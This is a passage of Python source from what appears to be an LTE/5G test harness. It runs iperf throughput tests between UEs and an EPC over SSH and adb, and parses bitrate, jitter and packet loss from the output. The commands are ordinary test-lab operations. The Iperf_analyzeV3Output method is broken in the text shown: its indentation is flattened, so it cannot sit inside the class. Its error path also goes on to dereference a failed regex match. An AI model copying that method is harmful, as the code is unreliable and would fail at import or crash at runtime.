		(0, device_id, UE_IPAddress, stats text) under the lock.
		NOTE(review): when the summary is absent nothing is queued, yet the
		method still returns 0 — callers cannot distinguish that case here.
		"""
		SSH.command('awk -f /tmp/tcp_iperf_stats.awk ' + EPC.SourceCodePath + '/scripts/iperf_' + self.testCase_id + '_' + device_id + '.log', '\$', 5)
		result = re.search('Avg Bitrate : (?P<average>[0-9\.]+ Mbits\/sec) Max Bitrate : (?P<maximum>[0-9\.]+ Mbits\/sec) Min Bitrate : (?P<minimum>[0-9\.]+ Mbits\/sec)', SSH.getBefore())
		if result is not None:
			avgbitrate = result.group('average')
			maxbitrate = result.group('maximum')
			minbitrate = result.group('minimum')
			lock.acquire()
			logging.debug('\u001B[1;37;44m TCP iperf result (' + UE_IPAddress + ') \u001B[0m')
			msg = 'TCP Stats :\n'
			if avgbitrate is not None:
				logging.debug('\u001B[1;34m Avg Bitrate : ' + avgbitrate + '\u001B[0m')
				msg += 'Avg Bitrate : ' + avgbitrate + '\n'
			if maxbitrate is not None:
				logging.debug('\u001B[1;34m Max Bitrate : ' + maxbitrate + '\u001B[0m')
				msg += 'Max Bitrate : ' + maxbitrate + '\n'
			if minbitrate is not None:
				logging.debug('\u001B[1;34m Min Bitrate : ' + minbitrate + '\u001B[0m')
				msg += 'Min Bitrate : ' + minbitrate + '\n'
			statusQueue.put(0)
			statusQueue.put(device_id)
			statusQueue.put(UE_IPAddress)
			statusQueue.put(msg)
			lock.release()
		return 0
	def Iperf_analyzeV2Output(self, lock, UE_IPAddress, device_id, statusQueue, iperf_real_options):
		"""Analyze a UDP iperf (v2) client run from the SSH output buffer.

		Returns:
		  0  -- 'Server Report:' line parsed; result record queued
		  -1 -- no server report present (connection refused or missing)
		  -2 -- server report present but not parseable
		Negative returns let the caller fall back to the server-side log.
		TCP runs (no '-u' option) are delegated to Iperf_analyzeV2TCPOutput.
		"""
		result = re.search('-u', str(iperf_real_options))
		if result is None:
			return self.Iperf_analyzeV2TCPOutput(lock, UE_IPAddress, device_id, statusQueue, iperf_real_options)
		result = re.search('Server Report:', SSH.getBefore())
		if result is None:
			result = re.search('read failed: Connection refused', SSH.getBefore())
			if result is not None:
				logging.debug('\u001B[1;37;41m Could not connect to iperf server! \u001B[0m')
			else:
				logging.debug('\u001B[1;37;41m Server Report and Connection refused Not Found! \u001B[0m')
			return -1
		# Computing the requested bandwidth in float
		result = re.search('-b (?P<iperf_bandwidth>[0-9\.]+)[KMG]', str(iperf_real_options))
		if result is not None:
			req_bandwidth = result.group('iperf_bandwidth')
			req_bw = float(req_bandwidth)
			# Scale to bits/sec according to the K/M/G unit suffix.
			result = re.search('-b [0-9\.]+K', str(iperf_real_options))
			if result is not None:
				req_bandwidth = '%.1f Kbits/sec' % req_bw
				req_bw = req_bw * 1000
			result = re.search('-b [0-9\.]+M', str(iperf_real_options))
			if result is not None:
				req_bandwidth = '%.1f Mbits/sec' % req_bw
				req_bw = req_bw * 1000000
			result = re.search('-b [0-9\.]+G', str(iperf_real_options))
			if result is not None:
				req_bandwidth = '%.1f Gbits/sec' % req_bw
				req_bw = req_bw * 1000000000
		result = re.search('Server Report:\\\\r\\\\n(?:|\[ *\d+\].*) (?P<bitrate>[0-9\.]+ [KMG]bits\/sec) +(?P<jitter>[0-9\.]+ ms) +(\d+\/..\d+) +(\((?P<packetloss>[0-9\.]+)%\))', SSH.getBefore())
		if result is not None:
			bitrate = result.group('bitrate')
			packetloss = result.group('packetloss')
			jitter = result.group('jitter')
			lock.acquire()
			logging.debug('\u001B[1;37;44m iperf result (' + UE_IPAddress + ') \u001B[0m')
			iperfStatus = True
			msg = 'Req Bitrate : ' + req_bandwidth + '\n'
			logging.debug('\u001B[1;34m Req Bitrate : ' + req_bandwidth + '\u001B[0m')
			if bitrate is not None:
				msg += 'Bitrate : ' + bitrate + '\n'
				logging.debug('\u001B[1;34m Bitrate : ' + bitrate + '\u001B[0m')
				# Achieved bitrate scaled to bits/sec, then expressed as a
				# percentage of the requested bandwidth.
				result = re.search('(?P<real_bw>[0-9\.]+) [KMG]bits/sec', str(bitrate))
				if result is not None:
					actual_bw = float(str(result.group('real_bw')))
					result = re.search('[0-9\.]+ K', bitrate)
					if result is not None:
						actual_bw = actual_bw * 1000
					result = re.search('[0-9\.]+ M', bitrate)
					if result is not None:
						actual_bw = actual_bw * 1000000
					result = re.search('[0-9\.]+ G', bitrate)
					if result is not None:
						actual_bw = actual_bw * 1000000000
					br_loss = 100 * actual_bw / req_bw
					bitperf = '%.2f ' % br_loss
					msg += 'Bitrate Perf: ' + bitperf + '%\n'
					logging.debug('\u001B[1;34m Bitrate Perf: ' + bitperf + '%\u001B[0m')
			if packetloss is not None:
				msg += 'Packet Loss : ' + packetloss + '%\n'
				logging.debug('\u001B[1;34m Packet Loss : ' + packetloss + '%\u001B[0m')
				if float(packetloss) > float(self.iperf_packetloss_threshold):
					msg += 'Packet Loss too high!\n'
					logging.debug('\u001B[1;37;41m Packet Loss too high \u001B[0m')
					iperfStatus = False
			if jitter is not None:
				msg += 'Jitter : ' + jitter + '\n'
				logging.debug('\u001B[1;34m Jitter : ' + jitter + '\u001B[0m')
			if (iperfStatus):
				statusQueue.put(0)
			else:
				statusQueue.put(-1)
			statusQueue.put(device_id)
			statusQueue.put(UE_IPAddress)
			statusQueue.put(msg)
			lock.release()
			return 0
		else:
			return -2
	def Iperf_analyzeV2Server(self, lock, UE_IPAddress, device_id, statusQueue, iperf_real_options):
		"""Analyze an iperf (v2) run from the server-side log file.

		Fallback path when the client report was unusable.  Averages the
		per-interval bitrate and jitter lines of the local log file and sums
		lost/sent packet counts, then queues a 4-item record: status is 1
		when the achieved bitrate is below 90% of the requested one, else 0.
		Queues a failure record when the log is missing or unparseable.
		"""
		if (not os.path.isfile('iperf_server_' + self.testCase_id + '_' + device_id + '.log')):
			self.ping_iperf_wrong_exit(lock, UE_IPAddress, device_id, statusQueue, 'Could not analyze from server log')
			return
		# Computing the requested bandwidth in float
		result = re.search('-b (?P<iperf_bandwidth>[0-9\.]+)[KMG]', str(iperf_real_options))
		if result is None:
			logging.debug('Iperf bandwidth Not Found!')
			self.ping_iperf_wrong_exit(lock, UE_IPAddress, device_id, statusQueue, 'Could not compute Iperf bandwidth!')
			return
		else:
			req_bandwidth = result.group('iperf_bandwidth')
			req_bw = float(req_bandwidth)
			# Scale to bits/sec according to the K/M/G unit suffix.
			result = re.search('-b [0-9\.]+K', str(iperf_real_options))
			if result is not None:
				req_bandwidth = '%.1f Kbits/sec' % req_bw
				req_bw = req_bw * 1000
			result = re.search('-b [0-9\.]+M', str(iperf_real_options))
			if result is not None:
				req_bandwidth = '%.1f Mbits/sec' % req_bw
				req_bw = req_bw * 1000000
			result = re.search('-b [0-9\.]+G', str(iperf_real_options))
			if result is not None:
				req_bandwidth = '%.1f Gbits/sec' % req_bw
				req_bw = req_bw * 1000000000
		server_file = open('iperf_server_' + self.testCase_id + '_' + device_id + '.log', 'r')
		# Accumulators over the per-interval report lines:
		# bitrate sum (bits/s), jitter sum (ms), lost/sent packet counts, line count.
		br_sum = 0.0
		ji_sum = 0.0
		pl_sum = 0
		ps_sum = 0
		row_idx = 0
		for line in server_file.readlines():
			result = re.search('(?P<bitrate>[0-9\.]+ [KMG]bits\/sec) +(?P<jitter>[0-9\.]+ ms) +(?P<lostPack>[0-9]+)/ +(?P<sentPack>[0-9]+)', str(line))
			if result is not None:
				bitrate = result.group('bitrate')
				jitter = result.group('jitter')
				packetlost = result.group('lostPack')
				packetsent = result.group('sentPack')
				br = bitrate.split(' ')
				ji = jitter.split(' ')
				row_idx = row_idx + 1
				curr_br = float(br[0])
				pl_sum = pl_sum + int(packetlost)
				ps_sum = ps_sum + int(packetsent)
				if (br[1] == 'Kbits/sec'):
					curr_br = curr_br * 1000
				if (br[1] == 'Mbits/sec'):
					curr_br = curr_br * 1000 * 1000
				br_sum = curr_br + br_sum
				ji_sum = float(ji[0]) + ji_sum
		if (row_idx > 0):
			# Average over intervals, then pretty-print with a K/M unit.
			br_sum = br_sum / row_idx
			ji_sum = ji_sum / row_idx
			br_loss = 100 * br_sum / req_bw
			if (br_sum > 1000):
				br_sum = br_sum / 1000
				if (br_sum > 1000):
					br_sum = br_sum / 1000
					bitrate = '%.2f Mbits/sec' % br_sum
				else:
					bitrate = '%.2f Kbits/sec' % br_sum
			else:
				bitrate = '%.2f bits/sec' % br_sum
			bitperf = '%.2f ' % br_loss
			bitperf += '%'
			jitter = '%.2f ms' % (ji_sum)
			if (ps_sum > 0):
				pl = float(100 * pl_sum / ps_sum)
				packetloss = '%2.1f ' % (pl)
				packetloss += '%'
			else:
				packetloss = 'unknown'
			lock.acquire()
			# Status 1 flags an under-performing (below 90% of requested) run.
			if (br_loss < 90):
				statusQueue.put(1)
			else:
				statusQueue.put(0)
			statusQueue.put(device_id)
			statusQueue.put(UE_IPAddress)
			req_msg = 'Req Bitrate : ' + req_bandwidth
			bir_msg = 'Bitrate : ' + bitrate
			brl_msg = 'Bitrate Perf: ' + bitperf
			jit_msg = 'Jitter : ' + jitter
			pal_msg = 'Packet Loss : ' + packetloss
			statusQueue.put(req_msg + '\n' + bir_msg + '\n' + brl_msg + '\n' + jit_msg + '\n' + pal_msg + '\n')
			logging.debug('\u001B[1;37;45m iperf result (' + UE_IPAddress + ') \u001B[0m')
			logging.debug('\u001B[1;35m ' + req_msg + '\u001B[0m')
			logging.debug('\u001B[1;35m ' + bir_msg + '\u001B[0m')
			logging.debug('\u001B[1;35m ' + brl_msg + '\u001B[0m')
			logging.debug('\u001B[1;35m ' + jit_msg + '\u001B[0m')
			logging.debug('\u001B[1;35m ' + pal_msg + '\u001B[0m')
			lock.release()
		else:
			self.ping_iperf_wrong_exit(lock, UE_IPAddress, device_id, statusQueue, 'Could not analyze from server log')
		server_file.close()
def Iperf_analyzeV3Output(self, lock, UE_IPAddress, device_id, statusQueue):
result = re.search('(?P<bitrate>[0-9\.]+ [KMG]bits\/sec) +(?:|[0-9\.]+ ms +\d+\/\d+ \((?P<packetloss>[0-9\.]+)%\)) +(?:|receiver)\\\\r\\\\n(?:|\[ *\d+\] Sent \d+ datagrams)\\\\r\\\\niperf Done\.', SSH.getBefore())
if result is None:
result = re.search('(?P<error>iperf: error - [a-zA-Z0-9 :]+)', SSH.getBefore())
lock.acquire()
statusQueue.put(-1)
statusQueue.put(device_id)
statusQueue.put(UE_IPAddress)
if result is not None:
logging.debug('\u001B[1;37;41m ' + result.group('error') + ' \u001B[0m')
statusQueue.put(result.group('error'))
else:
logging.debug('\u001B[1;37;41m Bitrate and/or Packet Loss Not Found! \u001B[0m')
statusQueue.put('Bitrate and/or Packet Loss Not Found!')
lock.release()
bitrate = result.group('bitrate')
packetloss = result.group('packetloss')
lock.acquire()
logging.debug('\u001B[1;37;44m iperf result (' + UE_IPAddress + ') \u001B[0m')
logging.debug('\u001B[1;34m Bitrate : ' + bitrate + '\u001B[0m')
msg = 'Bitrate : ' + bitrate + '\n'
iperfStatus = True
if packetloss is not None:
logging.debug('\u001B[1;34m Packet Loss : ' + packetloss + '%\u001B[0m')
msg += 'Packet Loss : ' + packetloss + '%\n'
if float(packetloss) > float(self.iperf_packetloss_threshold):
logging.debug('\u001B[1;37;41m Packet Loss too high \u001B[0m')
msg += 'Packet Loss too high!\n'
iperfStatus = False
if (iperfStatus):
statusQueue.put(0)
else:
statusQueue.put(-1)
statusQueue.put(device_id)
statusQueue.put(UE_IPAddress)
statusQueue.put(msg)
lock.release()
	def Iperf_UL_common(self, lock, UE_IPAddress, device_id, idx, ue_num, statusQueue):
		"""Run an uplink iperf test for one UE (server on EPC, client on UE).

		The '-R' option in self.iperf_args selects this path (iperf2 has no
		reverse mode, so the roles are swapped by hand).  The server log is
		copied back for analysis when the client-side report is unusable.
		"""
		udpIperf = True
		result = re.search('-u', str(self.iperf_args))
		if result is None:
			udpIperf = False
		# Derive the EPC-side tunnel address by replacing the UE IP's last
		# octet with 1 — assumes a /24-style addressing plan; TODO confirm.
		ipnumbers = UE_IPAddress.split('.')
		if (len(ipnumbers) == 4):
			ipnumbers[3] = '1'
		EPC_Iperf_UE_IPAddress = ipnumbers[0] + '.' + ipnumbers[1] + '.' + ipnumbers[2] + '.' + ipnumbers[3]
		# Launch iperf server on EPC side (true for ltebox and old open-air-cn0
		# But for OAI-Rel14-CUPS, we launch from python executor and we are using its IP address as iperf client address
		launchFromEpc = True
		if re.match('OAI-Rel14-CUPS', EPC.Type, re.IGNORECASE):
			launchFromEpc = False
			cmd = 'hostname -I'
			ret = subprocess.run(cmd, shell=True, stdout=subprocess.PIPE, encoding='utf-8')
			if ret.stdout is not None:
				EPC_Iperf_UE_IPAddress = ret.stdout.strip()
		# One server port per UE so parallel tests do not collide.
		port = 5001 + idx
		if launchFromEpc:
			SSH.open(EPC.IPAddress, EPC.UserName, EPC.Password)
			SSH.command('cd ' + EPC.SourceCodePath + '/scripts', '\$', 5)
			SSH.command('rm -f iperf_server_' + self.testCase_id + '_' + device_id + '.log', '\$', 5)
			if udpIperf:
				SSH.command('echo $USER; nohup iperf -u -s -i 1 -p ' + str(port) + ' > iperf_server_' + self.testCase_id + '_' + device_id + '.log &', EPC.UserName, 5)
			else:
				SSH.command('echo $USER; nohup iperf -s -i 1 -p ' + str(port) + ' > iperf_server_' + self.testCase_id + '_' + device_id + '.log &', EPC.UserName, 5)
			SSH.close()
		else:
			# Match the UE's iperf version locally where possible.
			if self.ueIperfVersion == self.dummyIperfVersion:
				prefix = ''
			else:
				prefix = ''
				if self.ueIperfVersion == '2.0.5':
					prefix = '/opt/iperf-2.0.5/bin/'
			if udpIperf:
				cmd = 'nohup ' + prefix + 'iperf -u -s -i 1 -p ' + str(port) + ' > iperf_server_' + self.testCase_id + '_' + device_id + '.log 2>&1 &'
			else:
				cmd = 'nohup ' + prefix + 'iperf -s -i 1 -p ' + str(port) + ' > iperf_server_' + self.testCase_id + '_' + device_id + '.log 2>&1 &'
			logging.debug(cmd)
			subprocess.run(cmd, shell=True, stdout=subprocess.PIPE, encoding='utf-8')
			time.sleep(0.5)
		# Launch iperf client on UE
		if (device_id == 'OAI-UE'):
			SSH.open(self.UEIPAddress, self.UEUserName, self.UEPassword)
			SSH.command('cd ' + self.UESourceCodePath + '/cmake_targets', '\$', 5)
		else:
			SSH.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
			SSH.command('cd ' + EPC.SourceCodePath+ '/scripts', '\$', 5)
		iperf_time = self.Iperf_ComputeTime()
		time.sleep(0.5)
		if udpIperf:
			modified_options = self.Iperf_ComputeModifiedBW(idx, ue_num)
		else:
			modified_options = str(self.iperf_args)
		# '-R' selected this UL path; it must not reach the iperf2 command line.
		modified_options = modified_options.replace('-R','')
		time.sleep(0.5)
		SSH.command('rm -f iperf_' + self.testCase_id + '_' + device_id + '.log', '\$', 5)
		if (device_id == 'OAI-UE'):
			iperf_status = SSH.command('iperf -c ' + EPC_Iperf_UE_IPAddress + ' ' + modified_options + ' -p ' + str(port) + ' -B ' + UE_IPAddress + ' 2>&1 | stdbuf -o0 tee iperf_' + self.testCase_id + '_' + device_id + '.log', '\$', int(iperf_time)*5.0)
		else:
			if self.ADBCentralized:
				iperf_status = SSH.command('stdbuf -o0 adb -s ' + device_id + ' shell "/data/local/tmp/iperf -c ' + EPC_Iperf_UE_IPAddress + ' ' + modified_options + ' -p ' + str(port) + '" 2>&1 | stdbuf -o0 tee iperf_' + self.testCase_id + '_' + device_id + '.log', '\$', int(iperf_time)*5.0)
			else:
				iperf_status = SSH.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' \'adb -s ' + device_id + ' shell "/data/local/tmp/iperf -c ' + EPC_Iperf_UE_IPAddress + ' ' + modified_options + ' -p ' + str(port) + '"\' 2>&1 > iperf_' + self.testCase_id + '_' + device_id + '.log', '\$', int(iperf_time)*5.0)
		SSH.command('fromdos -o iperf_' + self.testCase_id + '_' + device_id + '.log', '\$', 5)
		SSH.command('cat iperf_' + self.testCase_id + '_' + device_id + '.log', '\$', 5)
		# TIMEOUT Case
		if iperf_status < 0:
			SSH.close()
			message = 'iperf on UE (' + str(UE_IPAddress) + ') crashed due to TIMEOUT !'
			logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
			SSH.close()
			self.ping_iperf_wrong_exit(lock, UE_IPAddress, device_id, statusQueue, message)
			return
		clientStatus = self.Iperf_analyzeV2Output(lock, UE_IPAddress, device_id, statusQueue, modified_options)
		SSH.close()
		# Kill iperf server on EPC side
		if launchFromEpc:
			SSH.open(EPC.IPAddress, EPC.UserName, EPC.Password)
			SSH.command('killall --signal SIGKILL iperf', EPC.UserName, 5)
			SSH.close()
		else:
			cmd = 'killall --signal SIGKILL iperf'
			logging.debug(cmd)
			subprocess.run(cmd, shell=True)
			time.sleep(1)
			SSH.copyout(EPC.IPAddress, EPC.UserName, EPC.Password, 'iperf_server_' + self.testCase_id + '_' + device_id + '.log', EPC.SourceCodePath + '/scripts')
		# in case of failure, retrieve server log
		if (clientStatus == -1) or (clientStatus == -2):
			if launchFromEpc:
				time.sleep(1)
				if (os.path.isfile('iperf_server_' + self.testCase_id + '_' + device_id + '.log')):
					os.remove('iperf_server_' + self.testCase_id + '_' + device_id + '.log')
				SSH.copyin(EPC.IPAddress, EPC.UserName, EPC.Password, EPC.SourceCodePath+ '/scripts/iperf_server_' + self.testCase_id + '_' + device_id + '.log', '.')
			self.Iperf_analyzeV2Server(lock, UE_IPAddress, device_id, statusQueue, modified_options)
		# in case of OAI-UE
		if (device_id == 'OAI-UE'):
			SSH.copyin(self.UEIPAddress, self.UEUserName, self.UEPassword, self.UESourceCodePath + '/cmake_targets/iperf_' + self.testCase_id + '_' + device_id + '.log', '.')
			SSH.copyout(EPC.IPAddress, EPC.UserName, EPC.Password, 'iperf_' + self.testCase_id + '_' + device_id + '.log', EPC.SourceCodePath + '/scripts')
	def Iperf_common(self, lock, UE_IPAddress, device_id, idx, ue_num, statusQueue):
		"""Run the iperf test for one UE (per-UE child process entry point).

		Detects which iperf binary/version the UE has, dispatches uplink
		runs ('-R') to Iperf_UL_common, otherwise starts the iperf server on
		the UE, runs the client from the EPC (or locally for OAI-Rel14-CUPS)
		for downlink, analyzes the client report, and falls back to the
		server log when that fails.  On unexpected exceptions the parent
		process is signalled with SIGUSR1.
		"""
		try:
			# Single-UE profile -- iperf only on one UE
			if self.iperf_profile == 'single-ue' and idx != 0:
				return
			useIperf3 = False
			udpIperf = True
			self.ueIperfVersion = '2.0.5'
			if (device_id != 'OAI-UE'):
				SSH.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
				# if by chance ADB server and EPC are on the same remote host, at least log collection will take care of it
				SSH.command('if [ ! -d ' + EPC.SourceCodePath + '/scripts ]; then mkdir -p ' + EPC.SourceCodePath + '/scripts ; fi', '\$', 5)
				SSH.command('cd ' + EPC.SourceCodePath + '/scripts', '\$', 5)
				# Checking if iperf / iperf3 are installed
				if self.ADBCentralized:
					SSH.command('adb -s ' + device_id + ' shell "ls /data/local/tmp"', '\$', 5)
				else:
					SSH.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' \'adb -s ' + device_id + ' shell "ls /data/local/tmp"\'', '\$', 60)
				result = re.search('iperf3', SSH.getBefore())
				if result is None:
					result = re.search('iperf', SSH.getBefore())
					if result is None:
						message = 'Neither iperf nor iperf3 installed on UE!'
						logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
						SSH.close()
						self.ping_iperf_wrong_exit(lock, UE_IPAddress, device_id, statusQueue, message)
						return
					else:
						# Only iperf2 present: probe its exact version.
						if self.ADBCentralized:
							SSH.command('adb -s ' + device_id + ' shell "/data/local/tmp/iperf --version"', '\$', 5)
						else:
							SSH.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' \'adb -s ' + device_id + ' shell "/data/local/tmp/iperf --version"\'', '\$', 60)
						result = re.search('iperf version 2.0.5', SSH.getBefore())
						if result is not None:
							self.ueIperfVersion = '2.0.5'
						result = re.search('iperf version 2.0.10', SSH.getBefore())
						if result is not None:
							self.ueIperfVersion = '2.0.10'
				else:
					useIperf3 = True
				SSH.close()
			else:
				# OAI soft UE: probe the iperf version on the UE host itself.
				SSH.open(self.UEIPAddress, self.UEUserName, self.UEPassword)
				SSH.command('iperf --version', '\$', 5)
				result = re.search('iperf version 2.0.5', SSH.getBefore())
				if result is not None:
					self.ueIperfVersion = '2.0.5'
				result = re.search('iperf version 2.0.10', SSH.getBefore())
				if result is not None:
					self.ueIperfVersion = '2.0.10'
				SSH.close()
			# in case of iperf, UL has its own function
			if (not useIperf3):
				result = re.search('-R', str(self.iperf_args))
				if result is not None:
					self.Iperf_UL_common(lock, UE_IPAddress, device_id, idx, ue_num, statusQueue)
					return
			# Launch the IPERF server on the UE side for DL
			if (device_id == 'OAI-UE'):
				SSH.open(self.UEIPAddress, self.UEUserName, self.UEPassword)
				SSH.command('cd ' + self.UESourceCodePath + '/cmake_targets', '\$', 5)
				SSH.command('rm -f iperf_server_' + self.testCase_id + '_' + device_id + '.log', '\$', 5)
				result = re.search('-u', str(self.iperf_args))
				if result is None:
					SSH.command('echo $USER; nohup iperf -B ' + UE_IPAddress + ' -s -i 1 > iperf_server_' + self.testCase_id + '_' + device_id + '.log &', self.UEUserName, 5)
					udpIperf = False
				else:
					SSH.command('echo $USER; nohup iperf -B ' + UE_IPAddress + ' -u -s -i 1 > iperf_server_' + self.testCase_id + '_' + device_id + '.log &', self.UEUserName, 5)
			else:
				SSH.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
				SSH.command('cd ' + EPC.SourceCodePath + '/scripts', '\$', 5)
				if self.ADBCentralized:
					if (useIperf3):
						SSH.command('stdbuf -o0 adb -s ' + device_id + ' shell /data/local/tmp/iperf3 -s &', '\$', 5)
					else:
						SSH.command('rm -f iperf_server_' + self.testCase_id + '_' + device_id + '.log', '\$', 5)
						result = re.search('-u', str(self.iperf_args))
						if result is None:
							SSH.command('echo $USER; nohup adb -s ' + device_id + ' shell "/data/local/tmp/iperf -s -i 1" > iperf_server_' + self.testCase_id + '_' + device_id + '.log &', self.ADBUserName, 5)
							udpIperf = False
						else:
							SSH.command('echo $USER; nohup adb -s ' + device_id + ' shell "/data/local/tmp/iperf -u -s -i 1" > iperf_server_' + self.testCase_id + '_' + device_id + '.log &', self.ADBUserName, 5)
				else:
					SSH.command('rm -f iperf_server_' + self.testCase_id + '_' + device_id + '.log', '\$', 5)
					SSH.command('echo $USER; nohup ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' \'adb -s ' + device_id + ' shell "/data/local/tmp/iperf -u -s -i 1" \' 2>&1 > iperf_server_' + self.testCase_id + '_' + device_id + '.log &', self.ADBUserName, 60)
			time.sleep(0.5)
			SSH.close()
			# Launch the IPERF client on the EPC side for DL (true for ltebox and old open-air-cn
			# But for OAI-Rel14-CUPS, we launch from python executor
			launchFromEpc = True
			if re.match('OAI-Rel14-CUPS', EPC.Type, re.IGNORECASE):
				launchFromEpc = False
			if launchFromEpc:
				SSH.open(EPC.IPAddress, EPC.UserName, EPC.Password)
				SSH.command('cd ' + EPC.SourceCodePath + '/scripts', '\$', 5)
			iperf_time = self.Iperf_ComputeTime()
			time.sleep(0.5)
			# For UDP runs the requested bandwidth is rescaled per UE.
			if udpIperf:
				modified_options = self.Iperf_ComputeModifiedBW(idx, ue_num)
			else:
				modified_options = str(self.iperf_args)
			time.sleep(0.5)
			if launchFromEpc:
				SSH.command('rm -f iperf_' + self.testCase_id + '_' + device_id + '.log', '\$', 5)
			else:
				if (os.path.isfile('iperf_' + self.testCase_id + '_' + device_id + '.log')):
					os.remove('iperf_' + self.testCase_id + '_' + device_id + '.log')
			if (useIperf3):
				SSH.command('stdbuf -o0 iperf3 -c ' + UE_IPAddress + ' ' + modified_options + ' 2>&1 | stdbuf -o0 tee iperf_' + self.testCase_id + '_' + device_id + '.log', '\$', int(iperf_time)*5.0)
				clientStatus = 0
				self.Iperf_analyzeV3Output(lock, UE_IPAddress, device_id, statusQueue)
			else:
				if launchFromEpc:
					iperf_status = SSH.command('stdbuf -o0 iperf -c ' + UE_IPAddress + ' ' + modified_options + ' 2>&1 | stdbuf -o0 tee iperf_' + self.testCase_id + '_' + device_id + '.log', '\$', int(iperf_time)*5.0)
				else:
					# Run the client locally, matching the UE's iperf version,
					# then push the log to the EPC for later collection.
					if self.ueIperfVersion == self.dummyIperfVersion:
						prefix = ''
					else:
						prefix = ''
						if self.ueIperfVersion == '2.0.5':
							prefix = '/opt/iperf-2.0.5/bin/'
					cmd = prefix + 'iperf -c ' + UE_IPAddress + ' ' + modified_options + ' 2>&1 > iperf_' + self.testCase_id + '_' + device_id + '.log'
					message = cmd + '\n'
					logging.debug(cmd)
					ret = subprocess.run(cmd, shell=True)
					iperf_status = ret.returncode
					SSH.copyout(EPC.IPAddress, EPC.UserName, EPC.Password, 'iperf_' + self.testCase_id + '_' + device_id + '.log', EPC.SourceCodePath + '/scripts')
					SSH.open(EPC.IPAddress, EPC.UserName, EPC.Password)
					SSH.command('cat ' + EPC.SourceCodePath + '/scripts/iperf_' + self.testCase_id + '_' + device_id + '.log', '\$', 5)
				# TIMEOUT case for the iperf2 client.
				if iperf_status < 0:
					if launchFromEpc:
						SSH.close()
					message = 'iperf on UE (' + str(UE_IPAddress) + ') crashed due to TIMEOUT !'
					logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
					self.ping_iperf_wrong_exit(lock, UE_IPAddress, device_id, statusQueue, message)
					return
				clientStatus = self.Iperf_analyzeV2Output(lock, UE_IPAddress, device_id, statusQueue, modified_options)
			SSH.close()
			# Kill the IPERF server that runs in background
			if (device_id == 'OAI-UE'):
				SSH.open(self.UEIPAddress, self.UEUserName, self.UEPassword)
				SSH.command('killall iperf', '\$', 5)
			else:
				SSH.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
				if self.ADBCentralized:
					SSH.command('stdbuf -o0 adb -s ' + device_id + ' shell ps | grep --color=never iperf | grep -v grep', '\$', 5)
				else:
					SSH.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' \'adb -s ' + device_id + ' shell "ps" | grep --color=never iperf | grep -v grep\'', '\$', 60)
				# Extract the iperf PID from the ps output and kill it on the UE.
				result = re.search('shell +(?P<pid>\d+)', SSH.getBefore())
				if result is not None:
					pid_iperf = result.group('pid')
					if self.ADBCentralized:
						SSH.command('stdbuf -o0 adb -s ' + device_id + ' shell kill -KILL ' + pid_iperf, '\$', 5)
					else:
						SSH.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' \'adb -s ' + device_id + ' shell "kill -KILL ' + pid_iperf + '"\'', '\$', 60)
			SSH.close()
			# if the client report is absent, try to analyze the server log file
			if (clientStatus == -1):
				time.sleep(1)
				if (os.path.isfile('iperf_server_' + self.testCase_id + '_' + device_id + '.log')):
					os.remove('iperf_server_' + self.testCase_id + '_' + device_id + '.log')
				if (device_id == 'OAI-UE'):
					SSH.copyin(self.UEIPAddress, self.UEUserName, self.UEPassword, self.UESourceCodePath + '/cmake_targets/iperf_server_' + self.testCase_id + '_' + device_id + '.log', '.')
				else:
					SSH.copyin(self.ADBIPAddress, self.ADBUserName, self.ADBPassword, EPC.SourceCodePath + '/scripts/iperf_server_' + self.testCase_id + '_' + device_id + '.log', '.')
				# fromdos has to be called on the python executor not on ADB server
				cmd = 'fromdos -o iperf_server_' + self.testCase_id + '_' + device_id + '.log'
				subprocess.run(cmd, shell=True)
				self.Iperf_analyzeV2Server(lock, UE_IPAddress, device_id, statusQueue, modified_options)
			# in case of OAI UE:
			if (device_id == 'OAI-UE'):
				if (os.path.isfile('iperf_server_' + self.testCase_id + '_' + device_id + '.log')):
					if not launchFromEpc:
						SSH.copyout(EPC.IPAddress, EPC.UserName, EPC.Password, 'iperf_server_' + self.testCase_id + '_' + device_id + '.log', EPC.SourceCodePath + '/scripts')
				else:
					SSH.copyin(self.UEIPAddress, self.UEUserName, self.UEPassword, self.UESourceCodePath + '/cmake_targets/iperf_server_' + self.testCase_id + '_' + device_id + '.log', '.')
					SSH.copyout(EPC.IPAddress, EPC.UserName, EPC.Password, 'iperf_server_' + self.testCase_id + '_' + device_id + '.log', EPC.SourceCodePath + '/scripts')
		except:
			# Any unexpected error aborts the whole run via the parent process.
			os.kill(os.getppid(),signal.SIGUSR1)
	def IperfNoS1(self):
		"""Run an iperf throughput test between the OAI UE and the eNB in noS1 mode.

		The iperf server runs on the eNB side when '-R' is present in
		self.iperf_args, otherwise on the UE side.  Client output (and, as a
		fallback, the server log) is analyzed and the verdict is pushed to the
		HTML report; on 'KO' the whole UE/eNB setup is auto-terminated.
		"""
		if RAN.eNBIPAddress == '' or RAN.eNBUserName == '' or RAN.eNBPassword == '' or self.UEIPAddress == '' or self.UEUserName == '' or self.UEPassword == '':
			HELP.GenericHelp(CONST.Version)
			sys.exit('Insufficient Parameter')
		check_eNB = True
		check_OAI_UE = True
		pStatus = self.CheckProcessExist(check_eNB, check_OAI_UE)
		if (pStatus < 0):
			HTML.CreateHtmlTestRow(self.iperf_args, 'KO', pStatus)
			self.AutoTerminateUEandeNB()
			return
		# '-R' in the iperf arguments means the eNB side hosts the server
		server_on_enb = re.search('-R', str(self.iperf_args))
		if server_on_enb is not None:
			iServerIPAddr = RAN.eNBIPAddress
			iServerUser = RAN.eNBUserName
			iServerPasswd = RAN.eNBPassword
			iClientIPAddr = self.UEIPAddress
